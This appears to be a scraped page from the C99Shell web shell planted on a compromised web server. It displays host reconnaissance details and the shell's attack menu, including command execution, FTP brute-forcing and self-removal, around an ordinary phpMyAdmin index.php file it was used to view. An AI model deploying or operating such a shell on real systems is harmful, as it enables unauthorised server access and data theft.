!C99Shell v. 1.0 pre-release build #13!

Software: Apache/2.0.54 (Unix) mod_perl/1.99_09 Perl/v5.8.0 mod_ssl/2.0.54 OpenSSL/0.9.7l DAV/2 FrontPage/5.0.2.2635 PHP/4.4.0 mod_gzip/2.0.26.1a 

uname -a: Linux snow.he.net 4.4.276-v2-mono-1 #1 SMP Wed Jul 21 11:21:17 PDT 2021 i686 

uid=99(nobody) gid=98(nobody) groups=98(nobody) 

Safe-mode: OFF (not secure)

/home/makras/public_html/db_admin/   drwxr-xr-x
Free 318.37 GB of 458.09 GB (69.5%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     index.php (4.92 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/* $Id: index.php,v 2.2 2003/11/26 22:52:24 rabus Exp $ */
// vim: expandtab sw=4 ts=4 sts=4:


/**
 * Gets core libraries and defines some variables
 */
require_once('./libraries/grab_globals.lib.php');
require_once(
'./libraries/common.lib.php');

// Gets the default font sizes
PMA_setFontSizes();

// Gets the host name
// loic1 - 2001/25/11: use the new globals arrays defined with php 4.1+
if (empty($HTTP_HOST)) {
    if (!empty(
$_ENV) && isset($_ENV['HTTP_HOST'])) {
        
$HTTP_HOST $_ENV['HTTP_HOST'];
    }
    else if (@
getenv('HTTP_HOST')) {
        
$HTTP_HOST getenv('HTTP_HOST');
    }
    else {
        
$HTTP_HOST '';
    }
}


/**
 * Defines the frameset
 */
// loic1: If left light mode -> urldecode the db name
if (isset($lightm_db)) {
// no longer urlencoded because of html entities in the db name
//    $db    = urldecode($lightm_db);
    
$db    $lightm_db;
    unset(
$lightm_db);
}
$url_query PMA_generate_common_url(isset($db) ? $db '');

header('Content-Type: text/html; charset=' $GLOBALS['charset']);

require_once(
'./libraries/relation.lib.php');
$cfgRelation PMA_getRelationsParam();

if (
$cfg['QueryHistoryDB'] && $cfgRelation['historywork']) {
    
PMA_purgeHistory($cfg['Server']['user']);
}

$phpmain_hash md5($cfg['PmaAbsoluteUri']);
$phpmain_hash_js time();
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Frameset//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-frameset.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="<?php echo $available_languages[$lang][2]; ?>" lang="<?php echo $available_languages[$lang][2]; ?>" dir="<?php echo $text_dir?>">
<head>
<title>phpMyAdmin <?php echo PMA_VERSION?> - <?php echo $HTTP_HOST?></title>
<meta http-equiv="Content-Type" content="text/html; charset=<?php echo $charset?>" />
<link rel="stylesheet" type="text/css" href="./css/phpmyadmin.css.php?lang=<?php echo $lang?>&amp;js_frame=right" />
</head>

<?php
if ($cfg['QueryFrame']) {

    if (
$cfg['QueryFrameJS']) {
        echo 
'<script type="text/javascript">' "\n";
        echo 
'<!--' "\n";
        echo 
'    document.writeln(\'<frameset cols="' $cfg['LeftWidth'] . ',*" rows="*" border="1" frameborder="1" framespacing="0">\');' "\n";
        echo 
'    document.writeln(\'    <frameset rows="*, 50" framespacing="0" frameborder="0" border="0">\');' "\n";
        echo 
'    document.writeln(\'        <frame src="left.php?' $url_query '&amp;hash=' $phpmain_hash $phpmain_hash_js '" name="nav" frameborder="0" />\');' "\n";
        echo 
'    document.writeln(\'        <frame src="queryframe.php?' $url_query '&amp;hash=' $phpmain_hash $phpmain_hash_js '" name="queryframe" frameborder="0" scrolling="no" />\');' "\n";
        echo 
'    document.writeln(\'    </frameset>\');' "\n";
        echo 
'    document.writeln(\'    <frame src="' . (empty($db) ? $cfg['DefaultTabServer']  : $cfg['DefaultTabDatabase']) . '?' $url_query '" name="phpmain' $phpmain_hash $phpmain_hash_js '" border="0" frameborder="0" />\');' "\n";
        echo 
'    document.writeln(\'    <noframes>\');' "\n";
        echo 
'    document.writeln(\'        <body bgcolor="#FFFFFF">\');' "\n";
        echo 
'    document.writeln(\'            <p>' str_replace("'""\'"$strNoFrames) . '</p>\');' "\n";
        echo 
'    document.writeln(\'        </body>\');' "\n";
        echo 
'    document.writeln(\'    </noframes>\');' "\n";
        echo 
'    document.writeln(\'</frameset>\');' "\n";
        echo 
'//-->' "\n";
        echo 
'</script>' "\n";
        echo 
"\n";
        echo 
'<noscript>' "\n";
    }

    echo 
'<frameset cols="' $cfg['LeftWidth'] . ',*" rows="*"  border="1" frameborder="1" framespacing="0">' "\n";
    echo 
'    <frameset rows="*, 50" framespacing="0" frameborder="0" border="0">' "\n";
    echo 
'        <frame src="left.php?' $url_query '&amp;hash=' $phpmain_hash '" name="nav" frameborder="0" />' "\n";
    echo 
'        <frame src="queryframe.php?' $url_query '&amp;hash=' $phpmain_hash '" name="queryframe" frameborder="0" scrolling="no" />' "\n";
    echo 
'    </frameset>' "\n";
    echo 
'    <frame src="' . (empty($db) ? $cfg['DefaultTabServer']  : $cfg['DefaultTabDatabase']) . '?' $url_query '" name="phpmain' $phpmain_hash '" frameborder="0" />' "\n";

} else {

    echo 
'<frameset cols="' $cfg['LeftWidth'] . ',*" rows="*" border="1" frameborder="1" framespacing="0">' "\n";
    echo 
'    <frame src="left.php?' $url_query '&amp;hash=' $phpmain_hash '" name="nav" frameborder="0" />' "\n";
    echo 
'    <frame src="' . (empty($db) ? $cfg['DefaultTabServer']  : $cfg['DefaultTabDatabase']) . '?' $url_query '" name="phpmain' $phpmain_hash '" frameborder="1" />' "\n";

}
?>

    <noframes>
        <body bgcolor="#FFFFFF">
            <p><?php echo $strNoFrames?></p>
        </body>
    </noframes>
</frameset>
<?php
if ($cfg['QueryFrame'] && $cfg['QueryFrameJS']) {
    echo 
'</noscript>' "\n";
}
?>

</html>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0046 ]--